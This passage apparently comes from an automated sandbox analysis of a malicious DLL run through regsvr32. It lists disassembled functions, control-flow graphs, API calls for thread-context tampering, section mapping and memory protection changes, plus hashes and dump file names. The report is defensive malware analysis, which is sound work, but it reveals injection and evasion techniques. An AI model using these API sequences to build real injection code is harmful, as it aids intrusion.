6c856461-6c85646c 1613->1623 1624 6c856875-6c85687e call 6c85ac40 1616->1624 1625 6c856881-6c85688f 1616->1625 1632 6c856591-6c85659a call 6c85ac40 1617->1632 1633 6c85659d-6c8565ab 1617->1633 1621->1575 1622->1623 1623->1537 1637 6c85646e-6c856477 call 6c85ac40 1623->1637 1624->1625 1625->1579 1639 6c856895-6c856899 1625->1639 1628->1609 1629->1628 1632->1633 1633->1539 1634 6c8565ad-6c8565b6 call 6c85ac40 1633->1634 1634->1539 1637->1537 1639->1592 1651 6c856802-6c856816 1643->1651 1652 6c856768-6c856779 NtGetContextThread 1643->1652 1655 6c8568fc-6c856905 1651->1655 1656 6c85681c 1651->1656 1658 6c85677f-6c856786 1652->1658 1659 6c8568de-6c8568fa 1652->1659 1655->1592 1656->1579 1660 6c8567ad-6c8567b4 1658->1660 1661 6c856788-6c8567a3 1658->1661 1659->1579 1659->1655 1662 6c8567b6-6c8567d1 1660->1662 1663 6c8567db-6c8567ea NtSetContextThread 1660->1663 1661->1660 1662->1663 1663->1659 1664 6c8567f0-6c8567fc NtClose 1663->1664 1664->1643 1664->1651
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C85631D
                                                                  • GetModuleHandleA.KERNEL32(?), ref: 6C85639D
                                                                  • LoadLibraryA.KERNEL32(?,?), ref: 6C8563AA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C856432
                                                                  • GetModuleHandleA.KERNEL32(?), ref: 6C8564F4
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C856571
                                                                    • Part of subcall function 6C920E90: memcpy.MSVCRT(00000000,?,6C854435,?,?,6C854435,?,?,00000005), ref: 6C920ED2
                                                                  • AddVectoredExceptionHandler.KERNEL32(00000001,6C856230), ref: 6C8565C0
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C8565E2
                                                                  • NtQuerySystemInformation.NTDLL ref: 6C85662D
                                                                  • NtOpenThread.NTDLL(00000000,001FFFFF,?,00000000), ref: 6C856707
                                                                  • NtGetContextThread.NTDLL(?,0001003F), ref: 6C856772
                                                                  • NtSetContextThread.NTDLL ref: 6C8567E3
                                                                  • NtClose.NTDLL ref: 6C8567F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AddressContextHandleInformationModuleProcQuery$CloseExceptionHandlerLibraryLoadOpenProcessSystemVectoredmemcpymemset
                                                                  • String ID: ?$called `Result::unwrap()` on an `Err` value$ymR:
                                                                  • API String ID: 731487932-1315676627
                                                                  • Opcode ID: b8e3a2d7afdadd9f56301cd5ec78c371c40f263423c8148e080df9279874600a
                                                                  • Instruction ID: 70167fcaf5a1639c6bac7042fc52a7b6955d1b41fe4906bf691d510a8d9dd35d
                                                                  • Opcode Fuzzy Hash: b8e3a2d7afdadd9f56301cd5ec78c371c40f263423c8148e080df9279874600a
                                                                  • Instruction Fuzzy Hash: 8A22B0B4E012189FEF61CFA4C980BEEB7F4AF19304F548519E814BB781E7B59A54CB60
                                                                  Function 6C8F26D0 Relevance: 15.6, APIs: 10, Instructions: 571COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1785 6c8f26d0-6c8f2727 ExitProcess 1786 6c8f2730-6c8f2746 GetCurrentProcessId 1785->1786 1787 6c8f276f-6c8f27ea call 6c921760 1786->1787 1788 6c8f2748 1786->1788 1792 6c8f27ec-6c8f27f8 call 6c85ac40 1787->1792 1793 6c8f27fb-6c8f2828 1787->1793 1790 6c8f2750-6c8f276d ProcessPrng 1788->1790 1790->1787 1790->1790 1792->1793 1795 6c8f282a-6c8f282f 1793->1795 1796 6c8f2840-6c8f286a 1793->1796 1798 6c8f2831-6c8f2836 1795->1798 1799 6c8f2870-6c8f287e 1795->1799 1800 6c8f2913-6c8f2928 call 6c85ac30 1796->1800 1802 6c8f28c4-6c8f28cd 1798->1802 1803 6c8f28ba-6c8f28c2 1799->1803 1804 6c8f2880-6c8f2890 1799->1804 1811 6c8f292e-6c8f2956 1800->1811 1812 6c8f2dc4-6c8f2dc9 1800->1812 1805 6c8f28d5-6c8f2904 1802->1805 1803->1802 1807 6c8f2c1e-6c8f2c2c 1804->1807 1808 6c8f2896-6c8f28b3 1804->1808 1809 6c8f2dcb 1805->1809 1810 6c8f290a-6c8f290f 1805->1810 1807->1802 1813 6c8f2c32-6c8f2c5a 1807->1813 1808->1802 1814 6c8f28b5 1808->1814 1815 6c8f2dcd-6c8f2dd6 call 6c920620 1809->1815 1810->1800 1816 6c8f2975-6c8f2977 1811->1816 1812->1815 1813->1805 1814->1813 1827 6c8f2dd9-6c8f2de6 1815->1827 1818 6c8f2979-6c8f297c 1816->1818 1819 6c8f29e0-6c8f29e6 1816->1819 1823 6c8f297e-6c8f2984 1818->1823 1824 6c8f29c0-6c8f29c4 1818->1824 1820 6c8f29ec-6c8f2a15 1819->1820 1821 6c8f2b80-6c8f2bb0 CreateNamedPipeW 1819->1821 1825 6c8f2a17-6c8f2a22 1820->1825 1826 6c8f2a80-6c8f2a90 1820->1826 1828 6c8f2bb6-6c8f2bc9 GetLastError 1821->1828 1829 6c8f2cb4-6c8f2cba 1821->1829 1830 6c8f2988-6c8f298a 1823->1830 1824->1819 1831 6c8f29c6-6c8f29cb 1824->1831 1836 6c8f2daa 1825->1836 1837 6c8f2a28-6c8f2a3f 1825->1837 1840 6c8f2966-6c8f2974 1826->1840 1838 6c8f2de8 1827->1838 1839 6c8f2e05-6c8f2e11 1827->1839 1841 6c8f2c5f-6c8f2c72 1828->1841 1842 6c8f2bcf-6c8f2bd2 1828->1842 1834 6c8f2ccd-6c8f2d2c call 6c8ed180 1829->1834 1835 6c8f2cbc-6c8f2cca call 6c85ac40 1829->1835 1843 6c8f298c-6c8f29ba 1830->1843 1844 6c8f2960 1830->1844 1832 6c8f2ad2-6c8f2ae2 1831->1832 1833 6c8f29d1-6c8f29dc 1831->1833 1845 6c8f2b2d-6c8f2b39 1832->1845 1846 6c8f2ae4-6c8f2af6 1832->1846 1833->1830 1865 6c8f2d31-6c8f2d3b 1834->1865 1835->1834 1852 6c8f2dae 1836->1852 1853 6c8f2a46-6c8f2a48 1837->1853 1854 6c8f2a41 1837->1854 1857 6c8f2e2c-6c8f2e83 call 6c9459b0 ReadFileEx 1838->1857 1858 6c8f2e1f-6c8f2e21 1839->1858 1859 6c8f2e13-6c8f2e1c call 6c85ac40 1839->1859 1840->1816 1855 6c8f2c85-6c8f2c8b 1841->1855 1856 6c8f2c74-6c8f2c82 call 6c85ac40 1841->1856 1850 6c8f2bd4-6c8f2bd8 1842->1850 1851 6c8f2be0-6c8f2be5 1842->1851 1843->1825 1849 6c8f2962 1844->1849 1862 6c8f2b42-6c8f2b57 1845->1862 1861 6c8f2af8-6c8f2b1c 1846->1861 1846->1862 1849->1840 1866 6c8f2bf4-6c8f2c02 1850->1866 1851->1841 1867 6c8f2be7-6c8f2bf2 1851->1867 1868 6c8f2db8-6c8f2dc2 call 6c920620 1852->1868 1853->1852 1869 6c8f2a4e-6c8f2a57 1853->1869 1854->1853 1871 6c8f2c8d-6c8f2c99 call 6c85ac40 1855->1871 1872 6c8f2c9c-6c8f2ca3 1855->1872 1856->1855 1887 6c8f2e85-6c8f2e8f 1857->1887 1888 6c8f2eb3-6c8f2ec3 GetLastError call 6c8f9e60 1857->1888 1858->1857 1860 6c8f2e23-6c8f2e27 CloseHandle 1858->1860 1859->1858 1860->1857 1874 6c8f2b1e-6c8f2b26 1861->1874 1875 6c8f2b59-6c8f2b76 1861->1875 1862->1874 1862->1875 1877 6c8f2d3d-6c8f2d5b 1865->1877 1878 6c8f2d74-6c8f2d9f 1865->1878 1866->1786 1879 6c8f2c08-6c8f2c19 call 6c85ac40 1866->1879 1867->1841 1867->1866 1868->1827 1869->1868 1881 6c8f2a5d-6c8f2a5f 1869->1881 1871->1872 1885 6c8f2d6c-6c8f2d73 1872->1885 1886 6c8f2ca9-6c8f2caf CloseHandle 1872->1886 1874->1845 1875->1821 1877->1885 1889 6c8f2d5d-6c8f2d69 call 6c85ac40 1877->1889 1878->1871 1890 6c8f2da5 1878->1890 1879->1786 1893 6c8f2a95 1881->1893 1894 6c8f2a61-6c8f2a72 1881->1894 1886->1885 1896 6c8f2e90-6c8f2e9d SleepEx 1887->1896 1907 6c8f2ec5-6c8f2ed1 1888->1907 1908 6c8f2ee4-6c8f2ee7 1888->1908 1889->1885 1890->1872 1900 6c8f2a97-6c8f2ab7 call 6c8be650 1893->1900 1894->1900 1896->1896 1901 6c8f2e9f-6c8f2ea4 1896->1901 1912 6c8f2abd-6c8f2acd 1900->1912 1913 6c8f2db0-6c8f2db4 1900->1913 1905 6c8f2ea6-6c8f2eaf call 6c8f9e60 1901->1905 1906 6c8f2ed3-6c8f2ee1 1901->1906 1905->1907 1915 6c8f2eb1 1905->1915 1906->1908 1911 6c8f2eea-6c8f2ef1 1907->1911 1908->1911 1912->1849 1913->1868 1915->1908
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(6C855B4B,?,6C8E66C3,?,?,6C855B4B,00000000), ref: 6C8F26D4
                                                                  • GetCurrentProcessId.KERNEL32 ref: 6C8F2730
                                                                  • ProcessPrng.BCRYPTPRIMITIVES(?,00000010), ref: 6C8F2758
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitPrng
                                                                  • String ID:
                                                                  • API String ID: 1405477490-0
                                                                  • Opcode ID: 05f8fdad851dff8cd6379f69d47779c643c2be709fb504816d67c3247da4e00f
                                                                  • Instruction ID: a89f14cc12c98bfb920d20605386e157687af30add2842404eed78a63da25113
                                                                  • Opcode Fuzzy Hash: 05f8fdad851dff8cd6379f69d47779c643c2be709fb504816d67c3247da4e00f
                                                                  • Instruction Fuzzy Hash: 8222F2719083919FD324CF28C58475ABBE1BF89348F148E2DF8A897781D779D846CB92
                                                                  Function 02636530 Relevance: 15.0, APIs: 10, Instructions: 32threadsleepsynchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00005510), ref: 02636535
                                                                  • GetConsoleWindow.KERNEL32(00000000), ref: 0263653D
                                                                  • ShowWindow.USER32(00000000), ref: 02636544
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02636550
                                                                  • PostThreadMessageA.USER32(00000000), ref: 02636557
                                                                  • GetInputState.USER32 ref: 0263655D
                                                                    • Part of subcall function 02635E40: _memset.LIBCMT ref: 02635E71
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005120,00000000,00000000,00000000), ref: 02636577
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02636585
                                                                  • CloseHandle.KERNEL32(0264DA78), ref: 02636591
                                                                  • Sleep.KERNEL32(0000012C), ref: 0263659C
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Window$CloseConsoleCreateCurrentExceptionFilterHandleInputMessageObjectPostShowSingleSleepStateUnhandledWait_memset
                                                                  • String ID:
                                                                  • API String ID: 1910205397-0
                                                                  • Opcode ID: 2de2f345751527c1cda5996534d36e3540a4fe83b4f5ed794f6101a8caac6b59
                                                                  • Instruction ID: 0e5f18c1cea4467eebb4bda50e7d1450b8b9f09299a3d6b470974b466e3d1c3f
                                                                  • Opcode Fuzzy Hash: 2de2f345751527c1cda5996534d36e3540a4fe83b4f5ed794f6101a8caac6b59
                                                                  • Instruction Fuzzy Hash: A0F05F7DEC5240BBE7116BB0DC0EF0D36A5AB29B12F901D10B357DA1C4CAA464A08B65
                                                                  Function 04FA189C Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateSection.NTDLL(CC32C43A,000F001F,00000000,CC32C442,00000040,08000000,00000000,00000000), ref: 04FA1935
                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 04FA19DD
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04FA1D51
                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 04FA1E06
                                                                  • VirtualProtect.KERNEL32(?,?,00000008,CC32C42A), ref: 04FA1E23
                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 04FA1EC6
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,CC32C42A), ref: 04FA1EF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                  • String ID:
                                                                  • API String ID: 2664363762-0
                                                                  • Opcode ID: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction ID: dff64424bcdeff338c92a6b6cc32ea56d382fe4cdb9a890eaba4a77aea14b026
                                                                  • Opcode Fuzzy Hash: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction Fuzzy Hash: 3A429BB1A08301AFD724CF24C944B6BB7E9FF88714F06496DF9859B241E730E966CB91
                                                                  Function 6C85BC60 Relevance: 9.3, APIs: 3, Strings: 2, Instructions: 587COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2227 6c85bc60-6c85bc73 2228 6c85c3a2-6c85c3a9 2227->2228 2229 6c85bc79-6c85bcbf call 6c88be00 GetSystemInfo 2227->2229 2232 6c85bcc5-6c85bcdf call 6c85ac30 2229->2232 2233 6c85bec9-6c85bef4 call 6c85ac30 2229->2233 2238 6c85bce5-6c85bd07 2232->2238 2239 6c85c3e0-6c85c3e4 call 6c920620 2232->2239 2240 6c85c3cb-6c85c3d7 call 6c920620 2233->2240 2241 6c85befa-6c85bf3d call 6c85c690 * 3 2233->2241 2242 6c85bd10-6c85bd36 2238->2242 2250 6c85c3e9-6c85c3f5 call 6c920620 2239->2250 2254 6c85c44b-6c85c5a9 2240->2254 2273 6c85bf67-6c85bf7b call 6c931cb0 2241->2273 2274 6c85bf3f-6c85bf4b 2241->2274 2246 6c85bd45-6c85bd77 2242->2246 2247 6c85bd38-6c85bd42 call 6c85f810 2242->2247 2252 6c85bd7f-6c85bd95 call 6c85ac30 2246->2252 2253 6c85bd79-6c85bd7d 2246->2253 2247->2246 2250->2254 2252->2250 2268 6c85bd9b-6c85bdb8 2252->2268 2253->2242 2253->2252 2265 6c85c5b1-6c85c5e5 call 6c85ac40 call 6c9459b0 call 6c92c040 call 6c85bc60 2254->2265 2266 6c85c5ab-6c85c5ac call 6c9459b0 2254->2266 2266->2265 2269 6c85be77-6c85be8b call 6c931cb0 2268->2269 2270 6c85bdbe-6c85be09 call 6c85c690 * 4 2268->2270 2292 6c85be91-6c85be9e 2269->2292 2293 6c85c073-6c85c07c 2269->2293 2347 6c85be10-6c85be12 2270->2347 2290 6c85bf95-6c85bf9e 2273->2290 2291 6c85bf7d-6c85bf81 2273->2291 2275 6c85bf50-6c85bf54 2274->2275 2280 6c85bf56-6c85bf59 2275->2280 2281 6c85bf5d-6c85bf5f 2275->2281 2280->2275 2286 6c85bf5b 2280->2286 2288 6c85c405-6c85c414 call 6c931a30 2281->2288 2289 6c85bf65 2281->2289 2286->2273 2288->2254 2289->2273 2301 6c85bfa4-6c85bfa8 2290->2301 2302 6c85c3f7 2290->2302 2299 6c85bfb1-6c85bfb6 2291->2299 2300 6c85bf83-6c85bf93 2291->2300 2303 6c85bea0-6c85beac call 6c85ac40 2292->2303 2304 6c85beaf-6c85beb5 2292->2304 2295 6c85c427-6c85c429 2293->2295 2296 6c85c082-6c85c086 2293->2296 2314 6c85c430-6c85c43a call 6c920620 2295->2314 2308 6c85c08c-6c85c0a1 call 6c85ac30 2296->2308 2309 6c85c3aa 2296->2309 2312 6c85bfbb-6c85bfd0 call 6c85ac30 2299->2312 2300->2312 2301->2312 2313 6c85bfaa-6c85bfaf 2301->2313 2306 6c85c3f9-6c85c403 call 6c920620 2302->2306 2303->2304 2304->2233 2307 6c85beb7-6c85bec6 call 6c85ac40 2304->2307 2306->2254 2307->2233 2340 6c85c0a7-6c85c0a9 2308->2340 2341 6c85c42b 2308->2341 2322 6c85c3af-6c85c3c0 memcpy 2309->2322 2337 6c85bfd6 2312->2337 2338 6c85c3d9-6c85c3de 2312->2338 2324 6c85bfd8-6c85bfec memcpy 2313->2324 2314->2254 2322->2303 2335 6c85c3c6 2322->2335 2330 6c85bffd-6c85c025 2324->2330 2331 6c85bfee-6c85bffa call 6c85ac40 2324->2331 2342 6c85c037-6c85c046 2330->2342 2343 6c85c027-6c85c032 call 6c85c720 2330->2343 2331->2330 2335->2304 2337->2324 2338->2306 2340->2322 2341->2314 2348 6c85c04c-6c85c052 2342->2348 2349 6c85c41b-6c85c425 call 6c920620 2342->2349 2356 6c85c0c1-6c85c0cf 2343->2356 2351 6c85be14-6c85be1c 2347->2351 2352 6c85be4d-6c85be59 2347->2352 2348->2349 2354 6c85c058-6c85c05a 2348->2354 2349->2254 2351->2352 2357 6c85be1e-6c85be4b call 6c85c690 * 4 2351->2357 2352->2269 2355 6c85be5b 2352->2355 2359 6c85c05c-6c85c069 call 6c85ac80 2354->2359 2360 6c85c0ae-6c85c0b3 2354->2360 2361 6c85be60-6c85be64 2355->2361 2363 6c85c0d1-6c85c0d7 2356->2363 2364 6c85c0f9-6c85c103 call 6c920620 2356->2364 2357->2347 2373 6c85c416 2359->2373 2374 6c85c06f-6c85c071 2359->2374 2362 6c85c0b5-6c85c0bd 2360->2362 2368 6c85be66-6c85be69 2361->2368 2369 6c85be6f-6c85be71 2361->2369 2362->2356 2363->2364 2370 6c85c0d9-6c85c0db 2363->2370 2364->2254 2368->2361 2376 6c85be6b-6c85be6d 2368->2376 2369->2269 2377 6c85c43c-6c85c448 call 6c931a30 2369->2377 2378 6c85c0dd-6c85c0f2 call 6c85ac30 2370->2378 2379 6c85c108-6c85c10d 2370->2379 2373->2349 2374->2362 2376->2269 2377->2254 2382 6c85c10f-6c85c12d 2378->2382 2394 6c85c0f4 2378->2394 2379->2382 2387 6c85c304-6c85c325 2382->2387 2388 6c85c133-6c85c13f 2382->2388 2391 6c85c327-6c85c336 call 6c85ac40 2387->2391 2392 6c85c339-6c85c343 2387->2392 2393 6c85c1e4-6c85c2ec call 6c921760 call 6c9232a0 * 2 2388->2393 2391->2392 2397 6c85c345-6c85c351 call 6c85ac40 2392->2397 2398 6c85c354-6c85c35a 2392->2398 2419 6c85c150-6c85c1de 2393->2419 2420 6c85c2f2-6c85c2ff call 6c85f620 2393->2420 2394->2364 2397->2398 2404 6c85c35c-6c85c368 call 6c85ac40 2398->2404 2405 6c85c36b-6c85c378 call 6c87e170 2398->2405 2404->2405 2413 6c85c38b-6c85c39f 2405->2413 2414 6c85c37a-6c85c388 call 6c85ac40 2405->2414 2413->2228 2414->2413 2419->2387 2419->2393 2420->2419
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C85BC92
                                                                  • memcpy.MSVCRT(00000001,?,?), ref: 6C85C3B2
                                                                    • Part of subcall function 6C9232A0: memcpy.MSVCRT(00000001,?,?,?,?,?,?,6C85BBED,?,?,?,8B3B74C0,00000000,00000000), ref: 6C9232DF
                                                                    • Part of subcall function 6C9232A0: memcpy.MSVCRT(00000030,?,?), ref: 6C923337
                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,?), ref: 6C85BFDB
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  • unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\cpu.rs, xrefs: 6C85BFB1
                                                                  • 0, xrefs: 6C85BDA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$FreeHeapInfoSystem
                                                                  • String ID: 0$unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\cpu.rs
                                                                  • API String ID: 1878083305-108933894
                                                                  • Opcode ID: eef4f53fa6d08433e55ed710b7023c77dd1d16fb77e0592ee1f50f1c8283410b
                                                                  • Instruction ID: f3b09253db005477455784e8b308f1bee93df94dfa90360540db53861a880d34
                                                                  • Opcode Fuzzy Hash: eef4f53fa6d08433e55ed710b7023c77dd1d16fb77e0592ee1f50f1c8283410b
                                                                  • Instruction Fuzzy Hash: 5022E371A087009FD3A0DF24C980BABB7E4AF99708F504D2DF88897752D7B1D855CB92
                                                                  Function 6C876890 Relevance: 3.2, APIs: 2, Instructions: 241nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C8768A8
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C876940
                                                                    • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: InformationProcessQuery$ErrorInfo
                                                                  • String ID:
                                                                  • API String ID: 2443618835-0
                                                                  • Opcode ID: 4a14874b0578123b135bf6367470ac8cec174dea00645e89a4e4b4a5fade4fc7
                                                                  • Instruction ID: a8c58b96e04eb2e68ca1e28c56473d9a394e018f3c72161dcf3fdca5b39558d7
                                                                  • Opcode Fuzzy Hash: 4a14874b0578123b135bf6367470ac8cec174dea00645e89a4e4b4a5fade4fc7
                                                                  • Instruction Fuzzy Hash: 7281A2B1E00209ABEB308F59CE85BAEB7B8AF15708F148934E914E7641F775DD1487B1
                                                                  Function 02632FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02633023
                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 02633044
                                                                    • Part of subcall function 026372CD: __getptd_noexit.LIBCMT ref: 026372CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexitrecvselect
                                                                  • String ID:
                                                                  • API String ID: 4248608111-0
                                                                  • Opcode ID: f85c3bd416469113dbdb5450d9eee8e1f3aeaf3aa75b828da6dbeba89133a4a6
                                                                  • Instruction ID: 6cd3c2cada555c20afbb29b33e1f85ba8c27b8abb8f07c1d46794a4cb797570d
                                                                  • Opcode Fuzzy Hash: f85c3bd416469113dbdb5450d9eee8e1f3aeaf3aa75b828da6dbeba89133a4a6
                                                                  • Instruction Fuzzy Hash: C821A3B0E00248ABDB22EF64DC84B9A77B5EF55314F1001E5E515AB3D0D7B0A994CFE5
                                                                  Function 6C8ADE90 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BCryptGenRandom.BCRYPT(00000000,00000020,?,00000002,00000000,?,?,?,6C8AD9A7,?,?,00000000,?,?,6C8A7D04,?), ref: 6C8ADEA7
                                                                  • SystemFunction036.ADVAPI32(00000020,?,00000000,00000020,?,00000002,00000000,?,?,?,6C8AD9A7,?,?,00000000,?), ref: 6C8ADEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
